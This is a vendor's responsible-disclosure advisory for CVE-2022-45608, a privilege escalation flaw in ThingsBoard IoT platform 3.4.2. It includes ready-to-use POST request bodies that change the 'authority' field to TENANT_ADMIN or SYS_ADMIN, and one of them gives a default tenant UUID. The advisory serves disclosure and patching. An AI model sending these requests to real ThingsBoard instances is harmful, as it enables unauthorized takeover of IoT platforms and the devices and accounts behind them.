Responsible disclosure: Access control vulnerability discovered in the ThingsBoard IoT platform
On December 2022, a security researcher from the Outpost24 Ghost Labs team discovered a vulnerability on the ThingsBoard IoT platform, where a normal user’s privileges can be escalated, by doing a simple post with an additional header, and exploiting the associated flaws, to take control over the entire platform and related accounts. Upon reporting of the vulnerability to the vendor, it was quickly resolved. While the communication has been largely monodirectional, the time to resolution and patch was swift. It is always a pleasure to see a development team taking user security so seriously.
In the latest version of the product, the vulnerability has been remediated. We strongly urge users of the platform to upgrade to the latest version. This is of extra importance for anyone who does not have control of all end users, as an initial access is needed to obtain the increased permissions.
ThingsBoard Vulnerability summary
- Product: ThingsBoard IoT platform
- Affected version(s): v3.4.2 (December 1, 2022) and possibly older
- CVE-ID: 2022-45608
Vulnerability description
The ThingsBoard IoT platform was affected by a vertical privilege escalation vulnerability.
A low privileged user (CUSTOMER_USER) was able to escalate his privileges (vertically) and become Administrator (TENANT_ADMIN) or system administrator (SYS_ADMIN) on the web application using a simple POST request with the platform’s REST API.
In order to exploit the vulnerability, the attacker would need to know the corresponding API's parameter (“authority”:“value”) and default user UUIDs, which can be easily identified from ThingsBoard’s official GitHub repository.
Vulnerability impact
Through our test on the latest version of the platform, we have reason to believe that all customers are affected.
Recreation flow
To verify the vulnerability, these steps were taken by our security researcher:
- Login under the cloud edition or install the affected ThingsBoard version (3.4.2) on your onpremises.
Affected versions: - After you signup and login into your main ThingsBoard dashboard, intercept the outgoing POST request, and modify the ‘authority’ value. In this example, we will escalate to a tenant administrator.
Getting Tenant Administrator access: POST
https://<thingsboardinstance>/api/user?sendActivationMail=false
{
"id":
{
"entityType": "USER",
"id": "XXXXXXXXX"
},
"createdTime": 0,
"additionalInfo":
{
"lastLoginTs": 1668422898320,
"failedLoginAttempts": 0,
"userCredentialsEnabled": true,
"lang": "en_US",
"homeDashboardHideToolbar": false
},
"tenantId":
{
"entityType": "TENANT",
"id": "XXXXXXXXXX"
},
"email": winston@foo.com, "authority": "TENANT_ADMIN", "firstName": "Winston", "lastName": null,
"name": winston@foo.com,
"language": "en_US",
"homeDashboardHideToolbar": false
}
Getting System Administrator access: POST
https://<thingsboardinstance>/api/user?sendActivationMail=false
{
"id":
{
"entityType": "USER",
"id": "XXXXXXXXX"
},
"createdTime": 0,
"additionalInfo":
{
"description": "",
"defaultDashboardId": null,
"defaultDashboardFullscreen": false,
"homeDashboardId": null,
"homeDashboardHideToolbar": false,
"userCredentialsEnabled": true,
"failedLoginAttempts": 0,
"lang": "en_US"
},
"tenantId":
{
"entityType": "TENANT",
"id": "13814000-1dd2-11b2-8080-808080808080"
},
"email": john@foo.com, "authority": "SYS_ADMIN", "firstName": "John", "lastName": "Wick",
"name": john@foo.com,
"language": "en_US",
"homeDashboardId": null,
"homeDashboardHideToolbar": false
}
Screenshots
In following screenshots, you can see how the low-level user is able to access admin resources.
Here’s the low-level user and his original ID and token:
Here’s the information that the low-level user can access:
Here is what it looks like after the user escalates permissions to Tenant Admin:
Remediation
To remediate this vulnerability, update to the latest version of the ThingsBoard IoT platform.
Lessons learned
Any vulnerability in a solution that is used to remotely control devices in homes or companies, brings a risk of enabling a pivoting point into those other networks. We have seen this in recent examples of supply chain attacks, most notably, the 2020 SolarWinds breach.
If you are an organization that grants access to information via web applications, proactive security testing is key. Beyond testing and auditing your own solution, you need to ensure that your vendors and MSPs are doing the same. Outpost24 provides security solutions to reduce your attack surface. Whether you are an application provider, or MSP, our experts our ready to help you with your security program.
About Ghost Labs
Ghost Labs is the specialist security unit within Outpost24 working in partnership with our clients to meet their penetration testing needs and objectives. Our experienced Offensive Security team offers enhanced and bespoke penetration testing security services such as advanced network penetration testing, (web)application testing, Red Teaming assessments and complex web application exploitation to help organizations have a true picture of their cyber risk. In addition, the Ghost Labs team is an active contributor to the security community with vulnerability research and coordinated responsible disclosure program.
Ghost Labs performs hundreds of successful penetration tests for its customers ranging from global enterprises to SMEs. Our team consists of highly skilled ethical hackers, covering a wide range of advanced testing services to help companies keep up with evolving threats and new technologies. To help businesses drive security maturity and mitigate risks posed by the evolving threat and techniques of the modern day hacker.